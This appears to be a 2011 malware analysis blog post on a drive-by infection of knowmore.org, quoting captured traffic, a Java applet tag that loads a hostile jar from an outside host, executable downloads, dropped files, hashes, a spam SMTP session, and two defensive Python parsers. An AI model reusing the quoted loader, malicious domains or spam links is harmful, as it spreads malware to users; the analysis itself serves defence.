
Knowmore.org Infected with Malicious Javascript Code

John has informed us about another possibly infected website:

hxxp://www.knowmore. org

A quick scan with vscan.urlvoid.com reports that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

We then browsed the website in our test environment; this is the resulting traffic:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Next, the page tries to load a Java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic follows, to the same host and with the same a= value, now with p=6 appended:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

The executable setup.exe is downloaded; its scan report:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 / 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................
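To triage exchanges like the ones above, here is an added Python example; it is not part of the original post. It parses constructed request/response samples modelled on the captures (hosts kept as captured, bodies cut down to their first bytes), decodes the base64 a= parameter that the kit carries unchanged from in.php to out.php, and recognises executable payloads by the MZ magic in the body rather than by the declared Content-Type, since the tamarer.com response carried an empty one.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples modelled on the captured exchanges in the post: each
# entry is (request text, response bytes or None). Response bodies are cut
# down to their first bytes, which is all the magic check needs.
EXCHANGES = [
    ("GET /count11.php HTTP/1.0\r\nReferer: http://knowmore.org/\r\nHost: maribit.com\r\n", None),
    ("GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0\r\n"
     "Referer: http://knowmore.org/\r\nHost: kagrinn.cz.cc\r\n", None),
    ("GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0\r\nHost: kagrinn.cz.cc\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
     b"Content-Length: 17920\r\nContent-Disposition: inline; filename=setup.exe\r\n\r\nMZ\x90\x00\x03"),
    ("GET /client1.exe HTTP/1.0\r\nHost: tamarer.com\r\n",
     b"HTTP/1.1 200 \r\nServer: Apache\r\nContent-Length: 650240\r\nContent-Type: \r\n\r\nMZ\x90\x00\x03"),
]


def parse_request(raw):
    """Split a request into method, path, query dict and lower-cased headers."""
    lines = raw.strip().split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path,
            "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
            "headers": headers}


def parse_response(raw):
    """Split a response into status code, lower-cased headers and body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers, "body": body}


def decode_tracking_param(value):
    """Base64-decode the kit's a= parameter and report whether it is readable text."""
    raw = base64.b64decode(value)
    printable = all(32 <= b < 127 for b in raw)
    return {"bytes": raw, "length": len(raw), "printable": printable}


def payload_name(req, resp):
    """Prefer the Content-Disposition filename, else the last path segment."""
    cd = resp["headers"].get("content-disposition", "")
    m = re.search(r'filename="?([^";]+)"?', cd)
    return m.group(1) if m else req["path"].rsplit("/", 1)[-1]


def triage(exchanges):
    """Return contacted hosts, decoded tracking parameters and executable payloads.

    Executables are recognised by the MZ magic in the body, not by the declared
    Content-Type: the second server in the capture sent an empty Content-Type.
    """
    hosts, params, payloads = [], {}, []
    for raw_req, raw_resp in exchanges:
        req = parse_request(raw_req)
        host = req["headers"].get("host", "?")
        if host not in hosts:
            hosts.append(host)
        tracking = req["query"].get("a")
        if tracking and tracking not in params:
            params[tracking] = decode_tracking_param(tracking)
        if raw_resp is None:
            continue
        resp = parse_response(raw_resp)
        if resp["body"].startswith(b"MZ"):
            payloads.append({
                "host": host, "path": req["path"],
                "filename": payload_name(req, resp),
                "declared_type": resp["headers"].get("content-type", ""),
                "declared_length": int(resp["headers"].get("content-length", "0")),
            })
    return {"hosts": hosts, "params": params, "payloads": payloads}


if __name__ == "__main__":
    result = triage(EXCHANGES)
    print("hosts:", ", ".join(result["hosts"]))
    for value, info in result["params"].items():
        print(f"a={value[:12]}... -> {info['length']} bytes, printable={info['printable']}")
    for p in result["payloads"]:
        print(f"executable from {p['host']}{p['path']} saved as {p['filename']} "
              f"(declared type {p['declared_type']!r}, {p['declared_length']} bytes)")
```

Run stand-alone, it lists the three hosts, reports that the a= value decodes to 25 non-printable bytes (an opaque tracking blob, not a readable URL), and flags both MZ bodies as executables, including the one served with no Content-Type.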

Files created during the infection (Packet.dll, wpcap.dll and npf.sys are the WinPcap user-mode libraries and NPF kernel driver, which give the malware raw access to the network interface):

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 / 9 (0%)

Other notable network traffic (a GET request carrying a Content-Length header and an implausible User-Agent, Firefox 1.5 on NetBSD/alpha):

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

The malware then tries to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains an HTTP link:

healthcontrol. dk/jhkop806.html

which redirects to:

pillrxdrugstorechains. at
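As an added example (not code from the original post), the following Python reconstructs the spam session above from a client/server transcript: it tracks the SMTP state through HELO, MAIL FROM, RCPT TO and DATA, pulls the subject and any URLs out of the message, and defangs the URLs the way this post writes them. The sample session is constructed from the captured lines; the HELO value is the anonymised XXX from the post, and the end-of-data exchange, elided in the capture, is filled in so the parser can finish the message.

```python
import re

# Constructed sample modelled on the SMTP session captured in the post: a list
# of (side, line) pairs, "S" for the mail server and "C" for the infected host.
# The body is reduced to the lines that matter; the last four lines are
# constructed (the capture ends before them).
SESSION = [
    ("S", "220 Comendo Mailfence V3"),
    ("C", "HELO XXX"),
    ("S", "250 ec3-node2.net.comendo.com says HELO to XXX:53746"),
    ("C", "MAIL FROM:<xxx@alcatel-lucent.com>"),
    ("S", "250 MAIL FROM accepted"),
    ("C", "RCPT TO:<xxx@lpmail.com>"),
    ("S", "250 RCPT TO accepted"),
    ("C", "DATA"),
    ("S", '354 continue.  finished with "\\r\\n.\\r\\n"'),
    ("C", "Subject: Bring extra pleasance to your xxx-life!"),
    ("C", ""),
    ("C", "FDA-approved blue-blu-colored med to heal ED!"),
    ("C", "http://healthcontrol.dk/jhkop806.html"),
    ("C", "."),
    ("S", "250 message accepted"),      # constructed, not in the capture
    ("C", "QUIT"),                      # constructed
    ("S", "221 closing connection"),    # constructed
]

URL_RE = re.compile(r"""https?://[^\s<>"']+""")


def defang(url):
    """Write a URL the way the post does: hxxp:// and a space before the TLD."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    head, dot, tld = host.rpartition(".")
    return f"{scheme.replace('http', 'hxxp')}://{head}{dot} {tld}{slash}{path}"


def parse_session(session):
    """Walk the dialogue and reconstruct envelope, headers, body and URLs.

    Client commands drive the state; the server reply to the final "." decides
    whether the relay actually accepted the message.
    """
    msg = {"helo": None, "mail_from": None, "rcpt_to": [], "headers": {},
           "body": [], "urls": [], "accepted": None}
    state = "commands"            # commands -> headers -> body -> end
    for side, line in session:
        if side == "C":
            if state == "commands":
                verb, _, arg = line.partition(" ")
                verb = verb.upper()
                if verb in ("HELO", "EHLO"):
                    msg["helo"] = arg
                elif verb == "MAIL":
                    msg["mail_from"] = arg.split("<", 1)[1].rstrip(">")
                elif verb == "RCPT":
                    msg["rcpt_to"].append(arg.split("<", 1)[1].rstrip(">"))
                elif verb == "DATA":
                    state = "headers"
            elif line == ".":
                state = "end"
            elif state == "headers":
                if line == "":
                    state = "body"
                else:
                    name, _, value = line.partition(":")
                    msg["headers"][name.strip().lower()] = value.strip()
            elif state == "body":
                msg["body"].append(line)
                msg["urls"].extend(URL_RE.findall(line))
        elif side == "S" and state == "end" and msg["accepted"] is None:
            msg["accepted"] = line.startswith("250")
    return msg


def report(msg):
    """Summarise the session as an analyst would log it, with URLs defanged."""
    sender_domain = msg["mail_from"].rpartition("@")[2] if msg["mail_from"] else ""
    return {
        "helo": msg["helo"],
        "sender": msg["mail_from"],
        # A bot that forges an envelope sender rarely identifies itself as that domain.
        "helo_matches_sender": bool(msg["helo"]) and msg["helo"].lower().endswith(sender_domain.lower()),
        "recipients": list(msg["rcpt_to"]),
        "subject": msg["headers"].get("subject"),
        "urls": [defang(u) for u in msg["urls"]],
        "accepted": msg["accepted"],
    }


if __name__ == "__main__":
    for key, value in report(parse_session(SESSION)).items():
        print(f"{key}: {value}")
```

The same walk works on a pcap-derived transcript with more recipients and a longer body; the parts worth keeping for the IOC list are the forged sender domain, the recipient list, the subject and the defanged URLs.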

URLVoid domains analysis:

http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at